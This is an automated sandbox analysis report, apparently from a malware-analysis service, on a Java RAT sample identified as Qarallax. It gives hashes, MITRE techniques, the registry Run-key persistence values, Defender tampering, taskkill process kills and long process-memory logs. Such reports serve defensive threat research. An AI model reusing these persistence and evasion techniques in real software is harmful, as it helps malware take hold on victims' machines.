qarallax | ddc0264f82a81e5c3070a77887e7840f0fbde2949b742b74381fe8ec39daa9b8

Analysis

max time kernel
97s
max time network
60s
platform
windows7_x64
resource
win7v200722
submitted
06-08-2020 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

REN42159.jar
Size

401KB
MD5

dc91a54b2286a05af54711ba5139a897
SHA1

ef36e7172287d286e7465442209d23d0d14ebf2e
SHA256

ddc0264f82a81e5c3070a77887e7840f0fbde2949b742b74381fe8ec39daa9b8
SHA512

a46142c6df8d614db6a0225d73dd72d73fd64e0a89b43f7d5da10d552f70c2f9d4aa9854e1ee68214c2c7f70d890374bf2853fbfcc39ecabef30c2fe71a10037

Score

10^/10

trojan qarallax persistence evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x000300000001355b-7.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
1432	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WKBnewJ = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\tHFwB\\YIYZS.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\WKBnewJ = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\tHFwB\\YIYZS.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\tHFwB\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\tHFwB\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\tHFwB\Desktop.ini	java.exe
File created	C:\Users\Admin\tHFwB\Desktop.ini	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\FPFrD	java.exe
File opened for modification	C:\Windows\System32\FPFrD	java.exe

Kills process with taskkill 17 IoCs

evasion

pid	Process
2272	taskkill.exe
1564	taskkill.exe
2324	taskkill.exe
2988	taskkill.exe
2384	taskkill.exe
1336	taskkill.exe
1904	taskkill.exe
2592	taskkill.exe
2400	taskkill.exe
1924	taskkill.exe
1552	taskkill.exe
1596	taskkill.exe
2176	taskkill.exe
560	taskkill.exe
1704	taskkill.exe
1840	taskkill.exe
2400	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1568	powershell.exe
1568	powershell.exe

Suspicious use of AdjustPrivilegeToken 98 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1536	WMIC.exe
Token: SeSecurityPrivilege	1536	WMIC.exe
Token: SeTakeOwnershipPrivilege	1536	WMIC.exe
Token: SeLoadDriverPrivilege	1536	WMIC.exe
Token: SeSystemProfilePrivilege	1536	WMIC.exe
Token: SeSystemtimePrivilege	1536	WMIC.exe
Token: SeProfSingleProcessPrivilege	1536	WMIC.exe
Token: SeIncBasePriorityPrivilege	1536	WMIC.exe
Token: SeCreatePagefilePrivilege	1536	WMIC.exe
Token: SeBackupPrivilege	1536	WMIC.exe
Token: SeRestorePrivilege	1536	WMIC.exe
Token: SeShutdownPrivilege	1536	WMIC.exe
Token: SeDebugPrivilege	1536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1536	WMIC.exe
Token: SeRemoteShutdownPrivilege	1536	WMIC.exe
Token: SeUndockPrivilege	1536	WMIC.exe
Token: SeManageVolumePrivilege	1536	WMIC.exe
Token: 33	1536	WMIC.exe
Token: 34	1536	WMIC.exe
Token: 35	1536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1536	WMIC.exe
Token: SeSecurityPrivilege	1536	WMIC.exe
Token: SeTakeOwnershipPrivilege	1536	WMIC.exe
Token: SeLoadDriverPrivilege	1536	WMIC.exe
Token: SeSystemProfilePrivilege	1536	WMIC.exe
Token: SeSystemtimePrivilege	1536	WMIC.exe
Token: SeProfSingleProcessPrivilege	1536	WMIC.exe
Token: SeIncBasePriorityPrivilege	1536	WMIC.exe
Token: SeCreatePagefilePrivilege	1536	WMIC.exe
Token: SeBackupPrivilege	1536	WMIC.exe
Token: SeRestorePrivilege	1536	WMIC.exe
Token: SeShutdownPrivilege	1536	WMIC.exe
Token: SeDebugPrivilege	1536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1536	WMIC.exe
Token: SeRemoteShutdownPrivilege	1536	WMIC.exe
Token: SeUndockPrivilege	1536	WMIC.exe
Token: SeManageVolumePrivilege	1536	WMIC.exe
Token: 33	1536	WMIC.exe
Token: 34	1536	WMIC.exe
Token: 35	1536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1792	WMIC.exe
Token: SeSecurityPrivilege	1792	WMIC.exe
Token: SeTakeOwnershipPrivilege	1792	WMIC.exe
Token: SeLoadDriverPrivilege	1792	WMIC.exe
Token: SeSystemProfilePrivilege	1792	WMIC.exe
Token: SeSystemtimePrivilege	1792	WMIC.exe
Token: SeProfSingleProcessPrivilege	1792	WMIC.exe
Token: SeIncBasePriorityPrivilege	1792	WMIC.exe
Token: SeCreatePagefilePrivilege	1792	WMIC.exe
Token: SeBackupPrivilege	1792	WMIC.exe
Token: SeRestorePrivilege	1792	WMIC.exe
Token: SeShutdownPrivilege	1792	WMIC.exe
Token: SeDebugPrivilege	1792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1792	WMIC.exe
Token: SeRemoteShutdownPrivilege	1792	WMIC.exe
Token: SeUndockPrivilege	1792	WMIC.exe
Token: SeManageVolumePrivilege	1792	WMIC.exe
Token: 33	1792	WMIC.exe
Token: 34	1792	WMIC.exe
Token: 35	1792	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1792	WMIC.exe
Token: SeSecurityPrivilege	1792	WMIC.exe
Token: SeTakeOwnershipPrivilege	1792	WMIC.exe
Token: SeLoadDriverPrivilege	1792	WMIC.exe
Token: SeSystemProfilePrivilege	1792	WMIC.exe
Token: SeSystemtimePrivilege	1792	WMIC.exe
Token: SeProfSingleProcessPrivilege	1792	WMIC.exe
Token: SeIncBasePriorityPrivilege	1792	WMIC.exe
Token: SeCreatePagefilePrivilege	1792	WMIC.exe
Token: SeBackupPrivilege	1792	WMIC.exe
Token: SeRestorePrivilege	1792	WMIC.exe
Token: SeShutdownPrivilege	1792	WMIC.exe
Token: SeDebugPrivilege	1792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1792	WMIC.exe
Token: SeRemoteShutdownPrivilege	1792	WMIC.exe
Token: SeUndockPrivilege	1792	WMIC.exe
Token: SeManageVolumePrivilege	1792	WMIC.exe
Token: 33	1792	WMIC.exe
Token: 34	1792	WMIC.exe
Token: 35	1792	WMIC.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	2592	taskkill.exe
Token: SeDebugPrivilege	2988	taskkill.exe
Token: SeDebugPrivilege	2400	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	2384	taskkill.exe
Token: SeDebugPrivilege	2400	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1432	java.exe

Suspicious use of WriteProcessMemory 777 IoCs

description	pid	Process	procid_target
PID 1432 wrote to memory of 1084	1432	java.exe	25
PID 1432 wrote to memory of 1084	1432	java.exe	25
PID 1432 wrote to memory of 1084	1432	java.exe	25
PID 1432 wrote to memory of 1112	1432	java.exe	26
PID 1432 wrote to memory of 1112	1432	java.exe	26
PID 1432 wrote to memory of 1112	1432	java.exe	26
PID 1112 wrote to memory of 1536	1112	cmd.exe	27
PID 1112 wrote to memory of 1536	1112	cmd.exe	27
PID 1112 wrote to memory of 1536	1112	cmd.exe	27
PID 1432 wrote to memory of 1252	1432	java.exe	28
PID 1432 wrote to memory of 1252	1432	java.exe	28
PID 1432 wrote to memory of 1252	1432	java.exe	28
PID 1252 wrote to memory of 1792	1252	cmd.exe	29
PID 1252 wrote to memory of 1792	1252	cmd.exe	29
PID 1252 wrote to memory of 1792	1252	cmd.exe	29
PID 1432 wrote to memory of 1776	1432	java.exe	30
PID 1432 wrote to memory of 1776	1432	java.exe	30
PID 1432 wrote to memory of 1776	1432	java.exe	30
PID 1432 wrote to memory of 520	1432	java.exe	31
PID 1432 wrote to memory of 520	1432	java.exe	31
PID 1432 wrote to memory of 520	1432	java.exe	31
PID 1432 wrote to memory of 628	1432	java.exe	32
PID 1432 wrote to memory of 628	1432	java.exe	32
PID 1432 wrote to memory of 628	1432	java.exe	32
PID 1432 wrote to memory of 968	1432	java.exe	33
PID 1432 wrote to memory of 968	1432	java.exe	33
PID 1432 wrote to memory of 968	1432	java.exe	33
PID 1432 wrote to memory of 1244	1432	java.exe	34
PID 1432 wrote to memory of 1244	1432	java.exe	34
PID 1432 wrote to memory of 1244	1432	java.exe	34
PID 1432 wrote to memory of 700	1432	java.exe	35
PID 1432 wrote to memory of 700	1432	java.exe	35
PID 1432 wrote to memory of 700	1432	java.exe	35
PID 1432 wrote to memory of 1524	1432	java.exe	36
PID 1432 wrote to memory of 1524	1432	java.exe	36
PID 1432 wrote to memory of 1524	1432	java.exe	36
PID 1432 wrote to memory of 1332	1432	java.exe	37
PID 1432 wrote to memory of 1332	1432	java.exe	37
PID 1432 wrote to memory of 1332	1432	java.exe	37
PID 1432 wrote to memory of 1684	1432	java.exe	38
PID 1432 wrote to memory of 1684	1432	java.exe	38
PID 1432 wrote to memory of 1684	1432	java.exe	38
PID 1432 wrote to memory of 1568	1432	java.exe	39
PID 1432 wrote to memory of 1568	1432	java.exe	39
PID 1432 wrote to memory of 1568	1432	java.exe	39
PID 1432 wrote to memory of 1944	1432	java.exe	40
PID 1432 wrote to memory of 1944	1432	java.exe	40
PID 1432 wrote to memory of 1944	1432	java.exe	40
PID 1432 wrote to memory of 1924	1432	java.exe	42
PID 1432 wrote to memory of 1924	1432	java.exe	42
PID 1432 wrote to memory of 1924	1432	java.exe	42
PID 1432 wrote to memory of 1952	1432	java.exe	41
PID 1432 wrote to memory of 1952	1432	java.exe	41
PID 1432 wrote to memory of 1952	1432	java.exe	41
PID 1684 wrote to memory of 2004	1684	cmd.exe	44
PID 1684 wrote to memory of 2004	1684	cmd.exe	44
PID 1684 wrote to memory of 2004	1684	cmd.exe	44
PID 1432 wrote to memory of 1984	1432	java.exe	45
PID 1432 wrote to memory of 1984	1432	java.exe	45
PID 1432 wrote to memory of 1984	1432	java.exe	45
PID 1432 wrote to memory of 1968	1432	java.exe	47
PID 1432 wrote to memory of 1968	1432	java.exe	47
PID 1432 wrote to memory of 1968	1432	java.exe	47
PID 1432 wrote to memory of 2024	1432	java.exe	48
PID 1432 wrote to memory of 2024	1432	java.exe	48
PID 1432 wrote to memory of 2024	1432	java.exe	48
PID 1432 wrote to memory of 1296	1432	java.exe	49
PID 1432 wrote to memory of 1296	1432	java.exe	49
PID 1432 wrote to memory of 1296	1432	java.exe	49
PID 1432 wrote to memory of 848	1432	java.exe	50
PID 1432 wrote to memory of 848	1432	java.exe	50
PID 1432 wrote to memory of 848	1432	java.exe	50
PID 1432 wrote to memory of 1032	1432	java.exe	57
PID 1432 wrote to memory of 1032	1432	java.exe	57
PID 1432 wrote to memory of 1032	1432	java.exe	57
PID 1432 wrote to memory of 1464	1432	java.exe	58
PID 1432 wrote to memory of 1464	1432	java.exe	58
PID 1432 wrote to memory of 1464	1432	java.exe	58
PID 1684 wrote to memory of 1532	1684	cmd.exe	61
PID 1684 wrote to memory of 1532	1684	cmd.exe	61
PID 1684 wrote to memory of 1532	1684	cmd.exe	61
PID 1432 wrote to memory of 1804	1432	java.exe	62
PID 1432 wrote to memory of 1804	1432	java.exe	62
PID 1432 wrote to memory of 1804	1432	java.exe	62
PID 1432 wrote to memory of 1792	1432	java.exe	63
PID 1432 wrote to memory of 1792	1432	java.exe	63
PID 1432 wrote to memory of 1792	1432	java.exe	63
PID 1432 wrote to memory of 1064	1432	java.exe	66
PID 1432 wrote to memory of 1064	1432	java.exe	66
PID 1432 wrote to memory of 1064	1432	java.exe	66
PID 1432 wrote to memory of 1416	1432	java.exe	68
PID 1432 wrote to memory of 1416	1432	java.exe	68
PID 1432 wrote to memory of 1416	1432	java.exe	68
PID 1432 wrote to memory of 1656	1432	java.exe	71
PID 1432 wrote to memory of 1656	1432	java.exe	71
PID 1432 wrote to memory of 1656	1432	java.exe	71
PID 1432 wrote to memory of 1904	1432	java.exe	72
PID 1432 wrote to memory of 1904	1432	java.exe	72
PID 1432 wrote to memory of 1904	1432	java.exe	72
PID 1432 wrote to memory of 1972	1432	java.exe	73
PID 1432 wrote to memory of 1972	1432	java.exe	73
PID 1432 wrote to memory of 1972	1432	java.exe	73
PID 1432 wrote to memory of 1292	1432	java.exe	75
PID 1432 wrote to memory of 1292	1432	java.exe	75
PID 1432 wrote to memory of 1292	1432	java.exe	75
PID 1432 wrote to memory of 1552	1432	java.exe	76
PID 1432 wrote to memory of 1552	1432	java.exe	76
PID 1432 wrote to memory of 1552	1432	java.exe	76
PID 1656 wrote to memory of 1704	1656	cmd.exe	77
PID 1656 wrote to memory of 1704	1656	cmd.exe	77
PID 1656 wrote to memory of 1704	1656	cmd.exe	77
PID 1432 wrote to memory of 1132	1432	java.exe	79
PID 1432 wrote to memory of 1132	1432	java.exe	79
PID 1432 wrote to memory of 1132	1432	java.exe	79
PID 1432 wrote to memory of 1808	1432	java.exe	82
PID 1432 wrote to memory of 1808	1432	java.exe	82
PID 1432 wrote to memory of 1808	1432	java.exe	82
PID 1432 wrote to memory of 1236	1432	java.exe	85
PID 1432 wrote to memory of 1236	1432	java.exe	85
PID 1432 wrote to memory of 1236	1432	java.exe	85
PID 1432 wrote to memory of 1116	1432	java.exe	87
PID 1432 wrote to memory of 1116	1432	java.exe	87
PID 1432 wrote to memory of 1116	1432	java.exe	87
PID 1432 wrote to memory of 1636	1432	java.exe	89
PID 1432 wrote to memory of 1636	1432	java.exe	89
PID 1432 wrote to memory of 1636	1432	java.exe	89
PID 1656 wrote to memory of 1960	1656	cmd.exe	90
PID 1656 wrote to memory of 1960	1656	cmd.exe	90
PID 1656 wrote to memory of 1960	1656	cmd.exe	90
PID 1432 wrote to memory of 1076	1432	java.exe	91
PID 1432 wrote to memory of 1076	1432	java.exe	91
PID 1432 wrote to memory of 1076	1432	java.exe	91
PID 1432 wrote to memory of 1528	1432	java.exe	92
PID 1432 wrote to memory of 1528	1432	java.exe	92
PID 1432 wrote to memory of 1528	1432	java.exe	92
PID 1432 wrote to memory of 1124	1432	java.exe	93
PID 1432 wrote to memory of 1124	1432	java.exe	93
PID 1432 wrote to memory of 1124	1432	java.exe	93
PID 1432 wrote to memory of 652	1432	java.exe	94
PID 1432 wrote to memory of 652	1432	java.exe	94
PID 1432 wrote to memory of 652	1432	java.exe	94
PID 1432 wrote to memory of 1988	1432	java.exe	95
PID 1432 wrote to memory of 1988	1432	java.exe	95
PID 1432 wrote to memory of 1988	1432	java.exe	95
PID 1432 wrote to memory of 1820	1432	java.exe	96
PID 1432 wrote to memory of 1820	1432	java.exe	96
PID 1432 wrote to memory of 1820	1432	java.exe	96
PID 1432 wrote to memory of 1336	1432	java.exe	98
PID 1432 wrote to memory of 1336	1432	java.exe	98
PID 1432 wrote to memory of 1336	1432	java.exe	98
PID 1432 wrote to memory of 1696	1432	java.exe	106
PID 1432 wrote to memory of 1696	1432	java.exe	106
PID 1432 wrote to memory of 1696	1432	java.exe	106
PID 1432 wrote to memory of 1904	1432	java.exe	107
PID 1432 wrote to memory of 1904	1432	java.exe	107
PID 1432 wrote to memory of 1904	1432	java.exe	107
PID 1696 wrote to memory of 328	1696	cmd.exe	110
PID 1696 wrote to memory of 328	1696	cmd.exe	110
PID 1696 wrote to memory of 328	1696	cmd.exe	110
PID 1696 wrote to memory of 428	1696	cmd.exe	112
PID 1696 wrote to memory of 428	1696	cmd.exe	112
PID 1696 wrote to memory of 428	1696	cmd.exe	112
PID 1432 wrote to memory of 1640	1432	java.exe	113
PID 1432 wrote to memory of 1640	1432	java.exe	113
PID 1432 wrote to memory of 1640	1432	java.exe	113
PID 1432 wrote to memory of 1704	1432	java.exe	114
PID 1432 wrote to memory of 1704	1432	java.exe	114
PID 1432 wrote to memory of 1704	1432	java.exe	114
PID 1640 wrote to memory of 1960	1640	cmd.exe	115
PID 1640 wrote to memory of 1960	1640	cmd.exe	115
PID 1640 wrote to memory of 1960	1640	cmd.exe	115
PID 1640 wrote to memory of 1636	1640	cmd.exe	118
PID 1640 wrote to memory of 1636	1640	cmd.exe	118
PID 1640 wrote to memory of 1636	1640	cmd.exe	118
PID 1432 wrote to memory of 1520	1432	java.exe	119
PID 1432 wrote to memory of 1520	1432	java.exe	119
PID 1432 wrote to memory of 1520	1432	java.exe	119
PID 1520 wrote to memory of 1108	1520	cmd.exe	120
PID 1520 wrote to memory of 1108	1520	cmd.exe	120
PID 1520 wrote to memory of 1108	1520	cmd.exe	120
PID 1520 wrote to memory of 1076	1520	cmd.exe	121
PID 1520 wrote to memory of 1076	1520	cmd.exe	121
PID 1520 wrote to memory of 1076	1520	cmd.exe	121
PID 1432 wrote to memory of 1032	1432	java.exe	122
PID 1432 wrote to memory of 1032	1432	java.exe	122
PID 1432 wrote to memory of 1032	1432	java.exe	122
PID 1032 wrote to memory of 560	1032	cmd.exe	123
PID 1032 wrote to memory of 560	1032	cmd.exe	123
PID 1032 wrote to memory of 560	1032	cmd.exe	123
PID 1032 wrote to memory of 1768	1032	cmd.exe	124
PID 1032 wrote to memory of 1768	1032	cmd.exe	124
PID 1032 wrote to memory of 1768	1032	cmd.exe	124
PID 1432 wrote to memory of 1500	1432	java.exe	125
PID 1432 wrote to memory of 1500	1432	java.exe	125
PID 1432 wrote to memory of 1500	1432	java.exe	125
PID 1500 wrote to memory of 1292	1500	cmd.exe	126
PID 1500 wrote to memory of 1292	1500	cmd.exe	126
PID 1500 wrote to memory of 1292	1500	cmd.exe	126
PID 1500 wrote to memory of 1572	1500	cmd.exe	127
PID 1500 wrote to memory of 1572	1500	cmd.exe	127
PID 1500 wrote to memory of 1572	1500	cmd.exe	127
PID 1432 wrote to memory of 1400	1432	java.exe	128
PID 1432 wrote to memory of 1400	1432	java.exe	128
PID 1432 wrote to memory of 1400	1432	java.exe	128
PID 1400 wrote to memory of 1108	1400	cmd.exe	129
PID 1400 wrote to memory of 1108	1400	cmd.exe	129
PID 1400 wrote to memory of 1108	1400	cmd.exe	129
PID 1432 wrote to memory of 1840	1432	java.exe	130
PID 1432 wrote to memory of 1840	1432	java.exe	130
PID 1432 wrote to memory of 1840	1432	java.exe	130
PID 1400 wrote to memory of 328	1400	cmd.exe	131
PID 1400 wrote to memory of 328	1400	cmd.exe	131
PID 1400 wrote to memory of 328	1400	cmd.exe	131
PID 1432 wrote to memory of 1820	1432	java.exe	133
PID 1432 wrote to memory of 1820	1432	java.exe	133
PID 1432 wrote to memory of 1820	1432	java.exe	133
PID 1820 wrote to memory of 328	1820	cmd.exe	134
PID 1820 wrote to memory of 328	1820	cmd.exe	134
PID 1820 wrote to memory of 328	1820	cmd.exe	134
PID 1820 wrote to memory of 2056	1820	cmd.exe	135
PID 1820 wrote to memory of 2056	1820	cmd.exe	135
PID 1820 wrote to memory of 2056	1820	cmd.exe	135
PID 1432 wrote to memory of 2080	1432	java.exe	136
PID 1432 wrote to memory of 2080	1432	java.exe	136
PID 1432 wrote to memory of 2080	1432	java.exe	136
PID 2080 wrote to memory of 2112	2080	cmd.exe	137
PID 2080 wrote to memory of 2112	2080	cmd.exe	137
PID 2080 wrote to memory of 2112	2080	cmd.exe	137
PID 2080 wrote to memory of 2144	2080	cmd.exe	138
PID 2080 wrote to memory of 2144	2080	cmd.exe	138
PID 2080 wrote to memory of 2144	2080	cmd.exe	138
PID 1432 wrote to memory of 2160	1432	java.exe	139
PID 1432 wrote to memory of 2160	1432	java.exe	139
PID 1432 wrote to memory of 2160	1432	java.exe	139
PID 2160 wrote to memory of 2176	2160	cmd.exe	140
PID 2160 wrote to memory of 2176	2160	cmd.exe	140
PID 2160 wrote to memory of 2176	2160	cmd.exe	140
PID 2160 wrote to memory of 2188	2160	cmd.exe	141
PID 2160 wrote to memory of 2188	2160	cmd.exe	141
PID 2160 wrote to memory of 2188	2160	cmd.exe	141
PID 1432 wrote to memory of 2200	1432	java.exe	142
PID 1432 wrote to memory of 2200	1432	java.exe	142
PID 1432 wrote to memory of 2200	1432	java.exe	142
PID 2200 wrote to memory of 2216	2200	cmd.exe	143
PID 2200 wrote to memory of 2216	2200	cmd.exe	143
PID 2200 wrote to memory of 2216	2200	cmd.exe	143
PID 2200 wrote to memory of 2236	2200	cmd.exe	144
PID 2200 wrote to memory of 2236	2200	cmd.exe	144
PID 2200 wrote to memory of 2236	2200	cmd.exe	144
PID 1432 wrote to memory of 2248	1432	java.exe	145
PID 1432 wrote to memory of 2248	1432	java.exe	145
PID 1432 wrote to memory of 2248	1432	java.exe	145
PID 2248 wrote to memory of 2260	2248	cmd.exe	146
PID 2248 wrote to memory of 2260	2248	cmd.exe	146
PID 2248 wrote to memory of 2260	2248	cmd.exe	146
PID 1432 wrote to memory of 2272	1432	java.exe	147
PID 1432 wrote to memory of 2272	1432	java.exe	147
PID 1432 wrote to memory of 2272	1432	java.exe	147
PID 2248 wrote to memory of 2284	2248	cmd.exe	148
PID 2248 wrote to memory of 2284	2248	cmd.exe	148
PID 2248 wrote to memory of 2284	2248	cmd.exe	148
PID 1432 wrote to memory of 2308	1432	java.exe	150
PID 1432 wrote to memory of 2308	1432	java.exe	150
PID 1432 wrote to memory of 2308	1432	java.exe	150
PID 2308 wrote to memory of 2320	2308	cmd.exe	151
PID 2308 wrote to memory of 2320	2308	cmd.exe	151
PID 2308 wrote to memory of 2320	2308	cmd.exe	151
PID 2308 wrote to memory of 2340	2308	cmd.exe	152
PID 2308 wrote to memory of 2340	2308	cmd.exe	152
PID 2308 wrote to memory of 2340	2308	cmd.exe	152
PID 1432 wrote to memory of 2356	1432	java.exe	153
PID 1432 wrote to memory of 2356	1432	java.exe	153
PID 1432 wrote to memory of 2356	1432	java.exe	153
PID 2356 wrote to memory of 2380	2356	cmd.exe	154
PID 2356 wrote to memory of 2380	2356	cmd.exe	154
PID 2356 wrote to memory of 2380	2356	cmd.exe	154
PID 2356 wrote to memory of 2392	2356	cmd.exe	155
PID 2356 wrote to memory of 2392	2356	cmd.exe	155
PID 2356 wrote to memory of 2392	2356	cmd.exe	155
PID 1432 wrote to memory of 2404	1432	java.exe	156
PID 1432 wrote to memory of 2404	1432	java.exe	156
PID 1432 wrote to memory of 2404	1432	java.exe	156
PID 2404 wrote to memory of 2416	2404	cmd.exe	157
PID 2404 wrote to memory of 2416	2404	cmd.exe	157
PID 2404 wrote to memory of 2416	2404	cmd.exe	157
PID 2404 wrote to memory of 2432	2404	cmd.exe	158
PID 2404 wrote to memory of 2432	2404	cmd.exe	158
PID 2404 wrote to memory of 2432	2404	cmd.exe	158
PID 1432 wrote to memory of 2444	1432	java.exe	159
PID 1432 wrote to memory of 2444	1432	java.exe	159
PID 1432 wrote to memory of 2444	1432	java.exe	159
PID 2444 wrote to memory of 2456	2444	cmd.exe	160
PID 2444 wrote to memory of 2456	2444	cmd.exe	160
PID 2444 wrote to memory of 2456	2444	cmd.exe	160
PID 2444 wrote to memory of 2484	2444	cmd.exe	161
PID 2444 wrote to memory of 2484	2444	cmd.exe	161
PID 2444 wrote to memory of 2484	2444	cmd.exe	161
PID 1432 wrote to memory of 2500	1432	java.exe	162
PID 1432 wrote to memory of 2500	1432	java.exe	162
PID 1432 wrote to memory of 2500	1432	java.exe	162
PID 2500 wrote to memory of 2512	2500	cmd.exe	163
PID 2500 wrote to memory of 2512	2500	cmd.exe	163
PID 2500 wrote to memory of 2512	2500	cmd.exe	163
PID 2500 wrote to memory of 2528	2500	cmd.exe	164
PID 2500 wrote to memory of 2528	2500	cmd.exe	164
PID 2500 wrote to memory of 2528	2500	cmd.exe	164
PID 1432 wrote to memory of 2540	1432	java.exe	165
PID 1432 wrote to memory of 2540	1432	java.exe	165
PID 1432 wrote to memory of 2540	1432	java.exe	165
PID 2540 wrote to memory of 2552	2540	cmd.exe	166
PID 2540 wrote to memory of 2552	2540	cmd.exe	166
PID 2540 wrote to memory of 2552	2540	cmd.exe	166
PID 2540 wrote to memory of 2580	2540	cmd.exe	167
PID 2540 wrote to memory of 2580	2540	cmd.exe	167
PID 2540 wrote to memory of 2580	2540	cmd.exe	167
PID 1432 wrote to memory of 2592	1432	java.exe	168
PID 1432 wrote to memory of 2592	1432	java.exe	168
PID 1432 wrote to memory of 2592	1432	java.exe	168
PID 1432 wrote to memory of 2608	1432	java.exe	169
PID 1432 wrote to memory of 2608	1432	java.exe	169
PID 1432 wrote to memory of 2608	1432	java.exe	169
PID 2608 wrote to memory of 2644	2608	cmd.exe	171
PID 2608 wrote to memory of 2644	2608	cmd.exe	171
PID 2608 wrote to memory of 2644	2608	cmd.exe	171
PID 2608 wrote to memory of 2668	2608	cmd.exe	172
PID 2608 wrote to memory of 2668	2608	cmd.exe	172
PID 2608 wrote to memory of 2668	2608	cmd.exe	172
PID 1432 wrote to memory of 2684	1432	java.exe	173
PID 1432 wrote to memory of 2684	1432	java.exe	173
PID 1432 wrote to memory of 2684	1432	java.exe	173
PID 2684 wrote to memory of 2712	2684	cmd.exe	174
PID 2684 wrote to memory of 2712	2684	cmd.exe	174
PID 2684 wrote to memory of 2712	2684	cmd.exe	174
PID 2684 wrote to memory of 2724	2684	cmd.exe	175
PID 2684 wrote to memory of 2724	2684	cmd.exe	175
PID 2684 wrote to memory of 2724	2684	cmd.exe	175
PID 1432 wrote to memory of 2744	1432	java.exe	176
PID 1432 wrote to memory of 2744	1432	java.exe	176
PID 1432 wrote to memory of 2744	1432	java.exe	176
PID 2744 wrote to memory of 2756	2744	cmd.exe	177
PID 2744 wrote to memory of 2756	2744	cmd.exe	177
PID 2744 wrote to memory of 2756	2744	cmd.exe	177
PID 2744 wrote to memory of 2768	2744	cmd.exe	178
PID 2744 wrote to memory of 2768	2744	cmd.exe	178
PID 2744 wrote to memory of 2768	2744	cmd.exe	178
PID 1432 wrote to memory of 2780	1432	java.exe	179
PID 1432 wrote to memory of 2780	1432	java.exe	179
PID 1432 wrote to memory of 2780	1432	java.exe	179
PID 2780 wrote to memory of 2796	2780	cmd.exe	180
PID 2780 wrote to memory of 2796	2780	cmd.exe	180
PID 2780 wrote to memory of 2796	2780	cmd.exe	180
PID 2780 wrote to memory of 2808	2780	cmd.exe	181
PID 2780 wrote to memory of 2808	2780	cmd.exe	181
PID 2780 wrote to memory of 2808	2780	cmd.exe	181
PID 1432 wrote to memory of 2820	1432	java.exe	182
PID 1432 wrote to memory of 2820	1432	java.exe	182
PID 1432 wrote to memory of 2820	1432	java.exe	182
PID 2820 wrote to memory of 2832	2820	cmd.exe	183
PID 2820 wrote to memory of 2832	2820	cmd.exe	183
PID 2820 wrote to memory of 2832	2820	cmd.exe	183
PID 2820 wrote to memory of 2844	2820	cmd.exe	184
PID 2820 wrote to memory of 2844	2820	cmd.exe	184
PID 2820 wrote to memory of 2844	2820	cmd.exe	184
PID 1432 wrote to memory of 2856	1432	java.exe	185
PID 1432 wrote to memory of 2856	1432	java.exe	185
PID 1432 wrote to memory of 2856	1432	java.exe	185
PID 2856 wrote to memory of 2868	2856	cmd.exe	186
PID 2856 wrote to memory of 2868	2856	cmd.exe	186
PID 2856 wrote to memory of 2868	2856	cmd.exe	186
PID 2856 wrote to memory of 2880	2856	cmd.exe	187
PID 2856 wrote to memory of 2880	2856	cmd.exe	187
PID 2856 wrote to memory of 2880	2856	cmd.exe	187
PID 1432 wrote to memory of 2892	1432	java.exe	188
PID 1432 wrote to memory of 2892	1432	java.exe	188
PID 1432 wrote to memory of 2892	1432	java.exe	188
PID 2892 wrote to memory of 2904	2892	cmd.exe	189
PID 2892 wrote to memory of 2904	2892	cmd.exe	189
PID 2892 wrote to memory of 2904	2892	cmd.exe	189
PID 2892 wrote to memory of 2916	2892	cmd.exe	190
PID 2892 wrote to memory of 2916	2892	cmd.exe	190
PID 2892 wrote to memory of 2916	2892	cmd.exe	190
PID 1432 wrote to memory of 2928	1432	java.exe	191
PID 1432 wrote to memory of 2928	1432	java.exe	191
PID 1432 wrote to memory of 2928	1432	java.exe	191
